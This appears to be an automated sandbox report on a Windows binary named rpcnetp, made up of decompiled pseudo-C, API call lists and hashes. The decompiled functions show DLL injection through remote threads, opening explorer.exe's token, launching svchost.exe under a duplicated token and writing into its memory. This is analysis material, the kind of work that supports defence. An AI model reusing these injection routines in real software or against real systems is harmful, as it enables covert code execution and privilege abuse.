  • GetModuleFileNameA.KERNEL32(?,?,00000103,00A16060,00000000,?,00000000,00080000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000), ref: 00A131A5
  • RegisterClassA.USER32 ref: 00A131AB
  • CreateWindowExA.USER32 ref: 00A131B1
  • SetTimer.USER32(00000064,?,00000000), ref: 00A131D9
  • GetMessageA.USER32 ref: 00A131E6
  • TranslateMessage.USER32(?), ref: 00A131F4
  • DispatchMessageA.USER32 ref: 00A131FE
Memory Dump Source
  • Source File: 00000006.00000002.937118666.0000000000A11000.00000020.00020000.sdmp, Offset: 00A10000, based on PE: true
  • Associated: 00000006.00000002.937095794.0000000000A10000.00000002.00020000.sdmp
  • Associated: 00000006.00000002.937179586.0000000000A17000.00000004.00020000.sdmp
  • Associated: 00000006.00000002.937221221.0000000000A18000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_6_2_a10000_rpcnetp.jbxd
Similarity
  • API ID: Message$ClassCreateDispatchFileModuleNameRegisterTimerTranslateWindow
  • String ID:
  • API String ID: 2359640614-0
  • Opcode ID: 4fe2786f5314d3c2338f25eb3034e1d77bd71f948d143fbd939a69328f7c6ae2
  • Instruction ID: f0d20772072e72a8d143b65bed25b2e852bdf8aa4a98dfbb187828f7c5d83dc6
  • Opcode Fuzzy Hash: 4fe2786f5314d3c2338f25eb3034e1d77bd71f948d143fbd939a69328f7c6ae2
  • Instruction Fuzzy Hash: 2C113DB5940204BFD710DFB5DD49DEABBBDFB99741B10C629B602D21A0D6748A458B20
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

C-Code - Quality: 100%
			E00A12296() {
				int _v8;
				void* _v12;
				char _v44;
				long _t13;
				int _t23;

				_v8 = 0x80;
				_t13 = RegOpenKeyA(0x80000002, "System\\CurrentControlSet\\Services\\rpcnetp",  &_v12); // executed
				if(_t13 == 0) {
					RegQueryValueExA(_v12, 0, 0, 0, 0xa160c8,  &_v8);
					_t23 = 0x20;
					while(1) {
						_v8 = _t23;
						if(RegEnumValueA(_v12, 0,  &_v44,  &_v8, 0, 0, 0, 0) != 0) {
							break;
						}
						RegDeleteValueA(_v12,  &_v44);
					}
					return RegCloseKey(_v12);
				}
				return _t13;
			}









APIs
  • RegOpenKeyA.ADVAPI32(80000002,System\CurrentControlSet\Services\rpcnetp,?), ref: 00A122B1
  • RegQueryValueExA.ADVAPI32(?,00000000,00000000,00000000,00A160C8,00000080,00000002,00000000,00000001), ref: 00A122CF
  • RegDeleteValueA.ADVAPI32(?,?), ref: 00A122E7
  • RegEnumValueA.ADVAPI32 ref: 00A12300
  • RegCloseKey.ADVAPI32(?), ref: 00A12309
Strings
  • System\CurrentControlSet\Services\rpcnetp, xrefs: 00A122A0
Memory Dump Source
  • Source File: 00000006.00000002.937118666.0000000000A11000.00000020.00020000.sdmp, Offset: 00A10000, based on PE: true
  • Associated: 00000006.00000002.937095794.0000000000A10000.00000002.00020000.sdmp Download File
  • Associated: 00000006.00000002.937095794.0000000000A10000.00000002.00020000.sdmp
  • Associated: 00000006.00000002.937179586.0000000000A17000.00000004.00020000.sdmp
  • Associated: 00000006.00000002.937221221.0000000000A18000.00000002.00020000.sdmp
  • Snapshot File: hcaresult_6_2_a10000_rpcnetp.jbxd
Similarity
  • API ID: Value$CloseDeleteEnumOpenQuery
  • String ID: System\CurrentControlSet\Services\rpcnetp
  • API String ID: 1768883651-3077676073
  • Opcode ID: 3b89d886fdf6e6dc95bc26592623a7d622ee9a4ce3291173ffdd8d7b5f4b6d23
  • Instruction ID: cb40558d475af733679fd2657673d1c12212c91af12c3506530cf0eb41d4cfd3
  • Opcode Fuzzy Hash: 3b89d886fdf6e6dc95bc26592623a7d622ee9a4ce3291173ffdd8d7b5f4b6d23
  • Instruction Fuzzy Hash: D601E576901118BADB209BD1DD48EDFBF7CEF092A0F104061FA05A2010D6309A96EBA0
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

C-Code - Quality: 38%
			E00A124BC(void* __ecx, void* _a4, _Unknown_base(*)()* _a8, void* _a12, intOrPtr _a16, DWORD* _a20, intOrPtr _a24) {
				intOrPtr _v8;
				int _v12;
				void* _t14;
				int _t15;
				DWORD* _t20;
				intOrPtr _t24;

				_t20 = _a20;
				_t24 = _a16;
				_v12 = 0;
				_v8 = _t24;
				 *_t20 = 0; // executed
				_t14 = CreateRemoteThread(_a4, 0, 0, _a8, _a12, 0, 0); // executed
				_v12 = _t14;
				if(_t14 == 0) {
					_t15 = TerminateProcess(_a4, 0);
				} else {
					if(_a24 != 0) {
						_push(0xffffffff);
						_push(0);
						_push( &_v12);
						if(_t24 == 0) {
							_push(1);
						} else {
							_push(2);
						}
						if(WaitForMultipleObjects() == 0) {
							GetExitCodeThread(_v12, _t20);
						}
					} else {
						 *_t20 = 1;
					}
					_t15 = CloseHandle(_v12);
				}
				return _t15;
			}










APIs
  • CreateRemoteThread.KERNELBASE(?,00000000,00000000,?,?,00000000,00000000), ref: 00A124E1
  • WaitForMultipleObjects.KERNEL32(00000001,?,00000000,000000FF), ref: 00A1250C
  • GetExitCodeThread.KERNEL32(?,?), ref: 00A1251A
  • CloseHandle.KERNEL32(?), ref: 00A12523
  • TerminateProcess.KERNEL32(?,00000000), ref: 00A1252F
Memory Dump Source
  • Source File: 00000006.00000002.937118666.0000000000A11000.00000020.00020000.sdmp, Offset: 00A10000, based on PE: true
  • Associated: 00000006.00000002.937095794.0000000000A10000.00000002.00020000.sdmp
  • Associated: 00000006.00000002.937179586.0000000000A17000.00000004.00020000.sdmp
  • Associated: 00000006.00000002.937221221.0000000000A18000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_6_2_a10000_rpcnetp.jbxd
Similarity
  • API ID: Thread$CloseCodeCreateExitHandleMultipleObjectsProcessRemoteTerminateWait
  • String ID:
  • API String ID: 1317926807-0
  • Opcode ID: 078464f8f8a900559fe985d9e8852544c7dfc15ebc7327f30387866cb995fcc9
  • Instruction ID: a15e153925d0881e0cf38ab8bfa4885006603b907bf27c4a446f7c289a76373f
  • Opcode Fuzzy Hash: 078464f8f8a900559fe985d9e8852544c7dfc15ebc7327f30387866cb995fcc9
  • Instruction Fuzzy Hash: 4F113975801128FFCB229F82DC88ECF7F7AEF097A1F104101F60596150D3309AA1DBA1
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

C-Code - Quality: 100%
			E00A13420(intOrPtr _a4) {
				char _v264;
				struct HINSTANCE__* _t21;
				void* _t23;
				struct HINSTANCE__* _t25;
				intOrPtr _t26;

				_t23 = 1;
				_t25 =  *0xa160c4;
				if(_a4 == 0) {
					E00A12842( &_v264, 0); // executed
					_t21 = LoadLibraryA( &_v264); // executed
					if(_t21 != 0) {
						_t25 = _t21;
					}
				}
				_t4 = _t25 -  *0xa160c4 + 0xa17204; // 0x1140
				_t26 = _t4;
				 *0xa16008 = _t26;
				 *0xa160b4 = _t25 -  *0xa160c4 + 0xa17000;
				if( *((intOrPtr*)(_t26 + 0x24)) == 0) {
					 *((intOrPtr*)(_t26 + 0x24)) = GetCurrentProcessId();
					_t23 = 0;
				}
				 *(_t26 + 0x2c +  *(_t26 + 0x28) * 4) =  *0xa160c4;
				 *0xa16000 = _t26;
				return _t23;
			}









APIs
  • GetCurrentProcessId.KERNEL32(?,00000000), ref: 00A13480
    • Part of subcall function 00A12842: GetModuleFileNameA.KERNEL32(?,00000104), ref: 00A1285D
    • Part of subcall function 00A12842: lstrcpyA.KERNEL32(?,?), ref: 00A12893
    • Part of subcall function 00A12842: lstrlenA.KERNEL32(?), ref: 00A12896
    • Part of subcall function 00A12842: lstrcmpiA.KERNEL32(-00000003,00A112DC), ref: 00A128A4
    • Part of subcall function 00A12842: lstrcpyA.KERNEL32(-00000003,00A112DC), ref: 00A128B6
    • Part of subcall function 00A12842: CopyFileA.KERNEL32 ref: 00A128C3
    • Part of subcall function 00A12842: CreateFileA.KERNELBASE(?,C0000000,00000003,00000000,00000003,00000000,00000000), ref: 00A128DA
    • Part of subcall function 00A12842: SetFilePointer.KERNELBASE(00000000,?,00000000,00000000), ref: 00A1291F
    • Part of subcall function 00A12842: WriteFile.KERNELBASE(00000000,00000000,00000002,?,00000000), ref: 00A12931
    • Part of subcall function 00A12842: CloseHandle.KERNEL32(00000000), ref: 00A12938
  • LoadLibraryA.KERNELBASE(?,?,00000000), ref: 00A1344F
Memory Dump Source
  • Source File: 00000006.00000002.937118666.0000000000A11000.00000020.00020000.sdmp, Offset: 00A10000, based on PE: true
  • Associated: 00000006.00000002.937095794.0000000000A10000.00000002.00020000.sdmp
  • Associated: 00000006.00000002.937179586.0000000000A17000.00000004.00020000.sdmp
  • Associated: 00000006.00000002.937221221.0000000000A18000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_6_2_a10000_rpcnetp.jbxd
Similarity
  • API ID: File$lstrcpy$CloseCopyCreateCurrentHandleLibraryLoadModuleNamePointerProcessWritelstrcmpilstrlen
  • String ID:
  • API String ID: 2826298108-0
  • Opcode ID: ef5255370b548b0b57f14f32fd64dd85854cda71516374d9e7d00c6159a8c283
  • Instruction ID: b730dae998864ed558d88f2e9eca0f9613f8fa73e319efb8bf1147ecd3489de8
  • Opcode Fuzzy Hash: ef5255370b548b0b57f14f32fd64dd85854cda71516374d9e7d00c6159a8c283
  • Instruction Fuzzy Hash: 880121799012148FDB10DFB4DE847D577E8B70C355F02C5A9E64AD3254D370A986CF54
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

C-Code - Quality: 100%
			E00A12266(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				int _t7;

				 *0xa16014 = _a4;
				 *0xa16024 = _a12;
				 *0xa16028 = _a8; // executed
				_t7 = SetServiceStatus( *0xa160bc, 0xa16010); // executed
				return _t7;
			}





APIs
  • SetServiceStatus.ADVAPI32(00A16010,?,00A126C0,00000002,00001388,00000000), ref: 00A1228C
Memory Dump Source
  • Source File: 00000006.00000002.937118666.0000000000A11000.00000020.00020000.sdmp, Offset: 00A10000, based on PE: true
  • Associated: 00000006.00000002.937095794.0000000000A10000.00000002.00020000.sdmp Download File
  • Associated: 00000006.00000002.937095794.0000000000A10000.00000002.00020000.sdmp
  • Associated: 00000006.00000002.937179586.0000000000A17000.00000004.00020000.sdmp
  • Associated: 00000006.00000002.937221221.0000000000A18000.00000002.00020000.sdmp
  • Snapshot File: hcaresult_6_2_a10000_rpcnetp.jbxd
Similarity
  • API ID: ServiceStatus
  • String ID:
  • API String ID: 3969395364-0
  • Opcode ID: 6a1881f6f530f1c0d9da72d475f272331fe7c9d000439d551459df35f8cdf818
  • Instruction ID: 6886a58150bebcee19f4a7e57ddd0b6df9968df05e75662aabde50dab6faa405
  • Opcode Fuzzy Hash: 6a1881f6f530f1c0d9da72d475f272331fe7c9d000439d551459df35f8cdf818
  • Instruction Fuzzy Hash: F8D06775901308DF8710CF98E9449C57BE8FB0C710701C41AF908C3320D671E656DB55
Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Control-flow Graph

C-Code - Quality: 92%
			E72B22123(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				_Unknown_base(*)()* _t33;
				_Unknown_base(*)()* _t34;
				void* _t35;
				intOrPtr _t37;
				struct HINSTANCE__* _t45;
				void* _t46;
				void* _t49;
				long _t51;
				void* _t56;
				void* _t57;
				void* _t58;

				_t49 = __edx;
				_push(0x20);
				_push(0x72b253b8);
				E72B24A94(__ebx, __edi, __esi);
				 *(_t58 - 0x1c) =  *(_t58 - 0x1c) & 0x00000000;
				_t51 = 0x10000;
				 *(_t58 - 0x24) =  *(_t58 - 0x24) & 0x00000000;
				_t45 = LoadLibraryA("ntdll.dll");
				 *(_t58 - 0x20) = _t45;
				if(_t45 == 0) {
					L17:
					if( *(_t58 - 0x20) != 0) {
						FreeLibrary( *(_t58 - 0x20));
					}
					if( *(_t58 - 0x1c) != 0) {
						LocalFree( *(_t58 - 0x1c));
					}
					return E72B2159C( *(_t58 - 0x24), _t49);
				}
				_t33 = GetProcAddress(_t45, "NtQuerySystemInformation");
				 *(_t58 - 0x28) = _t33;
				if(_t33 == 0) {
					goto L17;
				}
				_t34 = GetProcAddress(_t45, "_wcsicmp");
				 *(_t58 - 0x2c) = _t34;
				if(_t34 == 0) {
					goto L17;
				}
				while(1) {
					_t35 = LocalAlloc(0x40, _t51);
					 *(_t58 - 0x1c) = _t35;
					if(_t35 == 0) {
						goto L17;
					}
					_t46 =  *(_t58 - 0x28)(5, _t35, _t51, 0);
					if(_t46 != 0xc0000004) {
						if(_t46 < 0) {
							goto L17;
						}
						L8:
						if(_t46 == 0xc0000004) {
							continue;
						}
						_t56 =  *(_t58 - 0x1c);
						 *(_t58 - 4) = 0;
						while(1) {
							_t37 =  *((intOrPtr*)(_t56 + 0x3c));
							if(_t37 == 0) {
								goto L14;
							}
							_push(L"explorer.exe");
							_push(_t37);
							if( *(_t58 - 0x2c)() != 0) {
								goto L14;
							}
							_t57 = OpenProcess(0x410, 0,  *(_t56 + 0x44));
							if(_t57 != 0) {
								OpenProcessToken(_t57, 0x200ff, _t58 - 0x24);
								CloseHandle(_t57);
							}
							L16:
							 *(_t58 - 4) =  *(_t58 - 4) | 0xffffffff;
							goto L17;
							L14:
							if( *_t56 == 0) {
								goto L16;
							}
							_t56 = _t56 +  *_t56;
							 *(_t58 - 0x30) = _t56;
						}
					}
					LocalFree( *(_t58 - 0x1c));
					 *(_t58 - 0x1c) =  *(_t58 - 0x1c) & 0x00000000;
					_t51 = _t51 + _t51;
					goto L8;
				}
				goto L17;
			}















APIs
  • LoadLibraryA.KERNEL32(ntdll.dll,72B253B8), ref: 72B22141
  • GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 72B22160
  • GetProcAddress.KERNEL32(00000000,_wcsicmp), ref: 72B22173
  • LocalAlloc.KERNEL32(00000040,00010000), ref: 72B22188
  • LocalFree.KERNEL32(00000000), ref: 72B221AB
  • OpenProcess.KERNEL32(00000410,00000000,?), ref: 72B221E8
  • OpenProcessToken.ADVAPI32(00000000,000200FF,?), ref: 72B221FE
  • CloseHandle.KERNEL32(00000000), ref: 72B22205
  • FreeLibrary.KERNEL32(00000000), ref: 72B2222C
  • LocalFree.KERNEL32(00000000), ref: 72B2223B
Strings
Memory Dump Source
  • Source File: 00000006.00000002.938126535.0000000072B21000.00000020.00020000.sdmp, Offset: 72B20000, based on PE: true
  • Associated: 00000006.00000002.938088725.0000000072B20000.00000002.00020000.sdmp
  • Associated: 00000006.00000002.938169246.0000000072B27000.00000004.00020000.sdmp
  • Associated: 00000006.00000002.938191585.0000000072B28000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_6_2_72b20000_rpcnetp.jbxd
Similarity
  • API ID: FreeLocal$AddressLibraryOpenProcProcess$AllocCloseHandleLoadToken
  • String ID: NtQuerySystemInformation$_wcsicmp$explorer.exe$ntdll.dll
  • API String ID: 3808024924-2858649656
  • Opcode ID: 7abd6da23679d2fa9a4c0e9d733775fbe992e5d219684f4782b4c9058f1b78f4
  • Instruction ID: 2cd11ee1f3bcf27d2bb61f551ead356f26b6ede089a07f4ab670a0598fbe968c
  • Opcode Fuzzy Hash: 7abd6da23679d2fa9a4c0e9d733775fbe992e5d219684f4782b4c9058f1b78f4
  • Instruction Fuzzy Hash: C831C332D503169FDB128FA9CD48B9EB6F4EF88317F210529E65AF6146DB764840CF50
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

C-Code - Quality: 91%
			E00A12123(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				_Unknown_base(*)()* _t33;
				_Unknown_base(*)()* _t34;
				void* _t35;
				intOrPtr _t37;
				struct HINSTANCE__* _t45;
				void* _t46;
				long _t50;
				void* _t55;
				void* _t56;
				void* _t57;

				_push(0x20);
				_push(0xa153b8);
				E00A14A94(__ebx, __edi, __esi);
				 *(_t57 - 0x1c) =  *(_t57 - 0x1c) & 0x00000000;
				_t50 = 0x10000;
				 *(_t57 - 0x24) =  *(_t57 - 0x24) & 0x00000000;
				_t45 = LoadLibraryA("ntdll.dll");
				 *(_t57 - 0x20) = _t45;
				if(_t45 == 0) {
					L17:
					if( *(_t57 - 0x20) != 0) {
						FreeLibrary( *(_t57 - 0x20));
					}
					if( *(_t57 - 0x1c) != 0) {
						LocalFree( *(_t57 - 0x1c));
					}
					return E00A1159C( *(_t57 - 0x24));
				}
				_t33 = GetProcAddress(_t45, "NtQuerySystemInformation");
				 *(_t57 - 0x28) = _t33;
				if(_t33 == 0) {
					goto L17;
				}
				_t34 = GetProcAddress(_t45, "_wcsicmp");
				 *(_t57 - 0x2c) = _t34;
				if(_t34 == 0) {
					goto L17;
				}
				while(1) {
					_t35 = LocalAlloc(0x40, _t50);
					 *(_t57 - 0x1c) = _t35;
					if(_t35 == 0) {
						goto L17;
					}
					_t46 =  *(_t57 - 0x28)(5, _t35, _t50, 0);
					if(_t46 != 0xc0000004) {
						if(_t46 < 0) {
							goto L17;
						}
						L8:
						if(_t46 == 0xc0000004) {
							continue;
						}
						_t55 =  *(_t57 - 0x1c);
						 *(_t57 - 4) = 0;
						while(1) {
							_t37 =  *((intOrPtr*)(_t55 + 0x3c));
							if(_t37 == 0) {
								goto L14;
							}
							_push(L"explorer.exe");
							_push(_t37);
							if( *(_t57 - 0x2c)() != 0) {
								goto L14;
							}
							_t56 = OpenProcess(0x410, 0,  *(_t55 + 0x44));
							if(_t56 != 0) {
								OpenProcessToken(_t56, 0x200ff, _t57 - 0x24);
								CloseHandle(_t56);
							}
							L16:
							 *(_t57 - 4) =  *(_t57 - 4) | 0xffffffff;
							goto L17;
							L14:
							if( *_t55 == 0) {
								goto L16;
							}
							_t55 = _t55 +  *_t55;
							 *(_t57 - 0x30) = _t55;
						}
					}
					LocalFree( *(_t57 - 0x1c));
					 *(_t57 - 0x1c) =  *(_t57 - 0x1c) & 0x00000000;
					_t50 = _t50 + _t50;
					goto L8;
				}
				goto L17;
			}


APIs
  • LoadLibraryA.KERNEL32(ntdll.dll,00A153B8), ref: 00A12141
  • GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00A12160
  • GetProcAddress.KERNEL32(00000000,_wcsicmp), ref: 00A12173
  • LocalAlloc.KERNEL32(00000040,00010000), ref: 00A12188
  • LocalFree.KERNEL32(00000000), ref: 00A121AB
  • OpenProcess.KERNEL32(00000410,00000000,?), ref: 00A121E8
  • OpenProcessToken.ADVAPI32(00000000,000200FF,?), ref: 00A121FE
  • CloseHandle.KERNEL32(00000000), ref: 00A12205
  • FreeLibrary.KERNEL32(00000000), ref: 00A1222C
  • LocalFree.KERNEL32(00000000), ref: 00A1223B
Strings
Memory Dump Source
  • Source File: 00000006.00000002.937118666.0000000000A11000.00000020.00020000.sdmp, Offset: 00A10000, based on PE: true
  • Associated: 00000006.00000002.937095794.0000000000A10000.00000002.00020000.sdmp
  • Associated: 00000006.00000002.937179586.0000000000A17000.00000004.00020000.sdmp
  • Associated: 00000006.00000002.937221221.0000000000A18000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_6_2_a10000_rpcnetp.jbxd
Similarity
  • API ID: FreeLocal$AddressLibraryOpenProcProcess$AllocCloseHandleLoadToken
  • String ID: NtQuerySystemInformation$_wcsicmp$explorer.exe$ntdll.dll
  • API String ID: 3808024924-2858649656
  • Opcode ID: 03db7c7b0cd1b0b1d719edaacbd2244d4539c06534855437c1ed6a73ac2d8651
  • Instruction ID: f35949a8f8dae5feebadd61eda2e6d63a78fbfc81483376e5cef68194900142f
  • Opcode Fuzzy Hash: 03db7c7b0cd1b0b1d719edaacbd2244d4539c06534855437c1ed6a73ac2d8651
  • Instruction Fuzzy Hash: CE31AB35E40316AFDB218BA4EC48BEEBAB8FF5C711F244125E611B2190DBB58DD1CB64
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 87%
			E72B227D2(void* __ecx, void* _a4, void* _a8, intOrPtr _a12) {
				signed int _v8;
				void* _t18;
				void* _t22;

				_t20 = __ecx;
				_push(__ecx);
				_v8 = _v8 & 0x00000000;
				_t18 = _a8;
				_t22 = VirtualAllocEx(_t18, 0, 0x1000, 0x1000, 4);
				if(_t22 != 0) {
					if(WriteProcessMemory(_t18, _t22, _a4, lstrlenA(_a4) + 1, 0) != 0) {
						E72B224BC(_t20, _t18, __imp__LoadLibraryA, _t22, _a12,  &_v8, 1);
					}
					VirtualFreeEx(_t18, _t22, 0x1000, 0x8000);
				}
				return _v8;
			}


APIs
  • VirtualAllocEx.KERNEL32(?,00000000,00001000,00001000,00000004,00000044,00000000,00000001,?,?,72B22C40,?,?,00000000,?,00000000), ref: 72B227EC
  • lstrlenA.KERNEL32(?,00000000,?,?,72B22C40,?,?,00000000,?,00000000), ref: 72B227FD
  • WriteProcessMemory.KERNEL32(?,00000000,?,00000001,?,?,72B22C40,?,?,00000000,?,00000000), ref: 72B2280A
  • VirtualFreeEx.KERNEL32(?,00000000,00001000,00008000,?,?,72B22C40,?,?,00000000,?,00000000), ref: 72B22832
    • Part of subcall function 72B224BC: CreateRemoteThread.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000), ref: 72B224E1
    • Part of subcall function 72B224BC: CloseHandle.KERNEL32(?,?,?,?,72B22C92,?,?,00000000,00000000,00000000,00000000), ref: 72B22523
Memory Dump Source
  • Source File: 00000006.00000002.938126535.0000000072B21000.00000020.00020000.sdmp, Offset: 72B20000, based on PE: true
  • Associated: 00000006.00000002.938088725.0000000072B20000.00000002.00020000.sdmp
  • Associated: 00000006.00000002.938169246.0000000072B27000.00000004.00020000.sdmp
  • Associated: 00000006.00000002.938191585.0000000072B28000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_6_2_72b20000_rpcnetp.jbxd
Similarity
  • API ID: Virtual$AllocCloseCreateFreeHandleMemoryProcessRemoteThreadWritelstrlen
  • String ID:
  • API String ID: 4087653319-0
  • Opcode ID: 39c991d06c0afe38bbd8af911b84375c92ec6c3a377ed9b082cef371d702e021
  • Instruction ID: 0632e4a538d9950daad9f33b8e47e12d35339e81be77794994d5613153f95a79
  • Opcode Fuzzy Hash: 39c991d06c0afe38bbd8af911b84375c92ec6c3a377ed9b082cef371d702e021
  • Instruction Fuzzy Hash: 16018176140384FBE7218A66CC49F9B3FBCEF89B92F215418BA0AE6182D675D900C774
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
			E72B21EDA() {

				StartServiceCtrlDispatcherA(0x72b26090);
				return  *0x72b2601c;
			}


APIs
  • StartServiceCtrlDispatcherA.ADVAPI32(72B26090,72B233A1,00000000), ref: 72B21EDF
Memory Dump Source
  • Source File: 00000006.00000002.938126535.0000000072B21000.00000020.00020000.sdmp, Offset: 72B20000, based on PE: true
  • Associated: 00000006.00000002.938088725.0000000072B20000.00000002.00020000.sdmp
  • Associated: 00000006.00000002.938169246.0000000072B27000.00000004.00020000.sdmp
  • Associated: 00000006.00000002.938191585.0000000072B28000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_6_2_72b20000_rpcnetp.jbxd
Similarity
  • API ID: CtrlDispatcherServiceStart
  • String ID:
  • API String ID: 3789849863-0
  • Opcode ID: f36af199deb20c7b046a8390761e8d1e67ab46b849b99dd81197df9eaff492b9
  • Instruction ID: 1ff4504a1fc5a67fa2b7bbbe65bc285f09ccc0412d46952d551e3b44151ad459
  • Opcode Fuzzy Hash: f36af199deb20c7b046a8390761e8d1e67ab46b849b99dd81197df9eaff492b9
  • Instruction Fuzzy Hash: C8A00275551341C75D7196558584F0677D1A748681311594CE45557206C6155441B521
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 91%
			E72B22ADB(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t70;
				intOrPtr _t84;
				void* _t117;
				void* _t119;
				struct _STARTUPINFOA _t121;
				void** _t122;
				void* _t125;

				_t119 = __edx;
				_t117 = __ecx;
				_push(0x180);
				_push(0x72b25410);
				E72B24A94(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t125 - 0x1c)) = 0;
				 *((intOrPtr*)(_t125 - 0x3c)) = 0;
				 *((intOrPtr*)(_t125 - 0x24)) =  *((intOrPtr*)( *0x72b26008 + 0x34));
				 *(_t125 - 0x40) = 0;
				 *(_t125 - 4) = 0;
				_t70 = OpenProcess(0x1fffff, 1, GetCurrentProcessId());
				 *(_t125 - 0x38) = _t70;
				if(_t70 == 0) {
					L26:
					 *(_t125 - 4) =  *(_t125 - 4) | 0xffffffff;
					E72B22D0B(0);
					return E72B2159C( *((intOrPtr*)(_t125 - 0x1c)), _t119);
				} else {
					_t121 = 0x44;
					E72B24D2D(_t125 - 0x8c, 0, _t121);
					 *(_t125 - 0x8c) = _t121;
					 *((short*)(_t125 - 0x5c)) = 0;
					 *((intOrPtr*)(_t125 - 0x60)) = 0x181;
					 *(_t125 - 0x4c) =  *(_t125 - 0x38);
					if( *((intOrPtr*)(_t125 - 0x24)) == 0 || E72B22598(_t125 - 0x190, 0x104) == 0) {
						E72B22842(_t125 - 0x190, 1);
					}
					if( *(_t125 + 8) == 0) {
						 *((intOrPtr*)(_t125 - 0x1c)) = CreateProcessA(0, _t125 - 0x190, 0, 0, 1, 4, 0, 0, _t125 - 0x8c, _t125 - 0x34);
					} else {
						_t122 = _t125 + 8;
						 *(_t125 - 0x20) = 0;
						 *(_t125 - 0x44) = 0;
						if(DuplicateTokenEx( *(_t125 + 8), 0x2000000, 0, 0, 1, _t125 - 0x20) != 0) {
							SetTokenInformation( *(_t125 - 0x20), 0xc, _t125 - 0x44, 4);
							_t122 = _t125 - 0x20;
						}
						_push(0);
						_push( *_t122);
						_push(_t125 - 0x40);
						L72B2446E();
						 *((intOrPtr*)(_t125 - 0x1c)) = CreateProcessAsUserA( *_t122, 0, _t125 - 0x190, 0, 0, 1, 0x404,  *(_t125 - 0x40), 0, _t125 - 0x8c, _t125 - 0x34);
						if( *(_t125 - 0x20) != 0) {
							CloseHandle( *(_t125 - 0x20));
						}
					}
					if( *((intOrPtr*)(_t125 - 0x24)) == 0) {
						L13:
						_t84 =  *((intOrPtr*)(_t125 - 0x1c));
						if(_t84 == 0) {
							goto L26;
						}
						if( *((intOrPtr*)(_t125 - 0x24)) == 0) {
							_t84 =  *0x72b260c4;
						}
						WriteProcessMemory( *(_t125 - 0x34), _t84 -  *0x72b260c4 + 0x72b260c8, 0x72b260c8, 0x80, 0);
						if( *((intOrPtr*)(_t125 - 0x24)) == 0) {
							ResumeThread( *(_t125 - 0x30));
							goto L23;
						} else {
							E72B224BC(0x72b260c8,  *(_t125 - 0x34),  *((intOrPtr*)( *0x72b26008 + 0x34)), 0, 0, _t125 - 0x1c, 0);
							if( *((intOrPtr*)(_t125 - 0x1c)) != 0) {
								L23:
								if( *0x72b26038 != 0) {
									E72B22758( *(_t125 - 0x34));
									 *(_t125 - 0x34) = 0;
								} else {
									 *((intOrPtr*)(_t125 - 0x3c)) = CreateThread(0, 0, E72B22758,  *(_t125 - 0x34), 0, _t125 - 0x48);
								}
								goto L26;
							}
							goto L18;
						}
					} else {
						if( *((intOrPtr*)(_t125 - 0x1c)) == 0) {
							L18:
							if( *(_t125 - 0x34) != 0) {
								TerminateProcess( *(_t125 - 0x34), 0);
								CloseHandle( *(_t125 - 0x34));
							}
							if( *(_t125 - 0x30) != 0) {
								CloseHandle( *(_t125 - 0x30));
							}
							goto L26;
						}
						E72B22842(_t125 - 0x190, 0);
						 *((intOrPtr*)(_t125 - 0x1c)) = E72B227D2(_t117, _t125 - 0x190,  *(_t125 - 0x34), 0);
						goto L13;
					}
				}
			}


APIs
  • GetCurrentProcessId.KERNEL32(72B25410,00000180,72B23357), ref: 72B22B03
  • OpenProcess.KERNEL32(001FFFFF,00000001,00000000), ref: 72B22B13
  • DuplicateTokenEx.ADVAPI32(?,02000000,00000000,00000000,00000001,00000000,?,00000001), ref: 72B22B92
  • SetTokenInformation.ADVAPI32(00000000,0000000C,?,00000004,?,?,?,?,?,?,?,?,?,?,?,?), ref: 72B22BA7
  • CreateEnvironmentBlock.USERENV(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 72B22BB7
  • CreateProcessAsUserA.ADVAPI32(?,00000000,?,00000000,00000000,00000001,00000404,?,00000000,?,?,?,?,00000000), ref: 72B22BDD
  • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000044), ref: 72B22BEE
  • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,00000004,00000000,00000000,?,?,?,00000001), ref: 72B22C10
  • WriteProcessMemory.KERNEL32(?,-72B260C4,72B260C8,00000080,00000000), ref: 72B22C70
  • TerminateProcess.KERNEL32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 72B22CA0
    • Part of subcall function 72B22598: GetSystemDirectoryA.KERNEL32(?,?), ref: 72B225AF
    • Part of subcall function 72B22598: lstrcatA.KERNEL32(?,\svchost.exe), ref: 72B225BD
  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000044), ref: 72B22CA9
  • CloseHandle.KERNEL32(?,?,?,00000000,00000000,00000000,00000000), ref: 72B22CB7
  • ResumeThread.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000044), ref: 72B22CC2
  • CreateThread.KERNEL32(00000000,00000000,Function_00002758,?,00000000,?), ref: 72B22CDF
Memory Dump Source
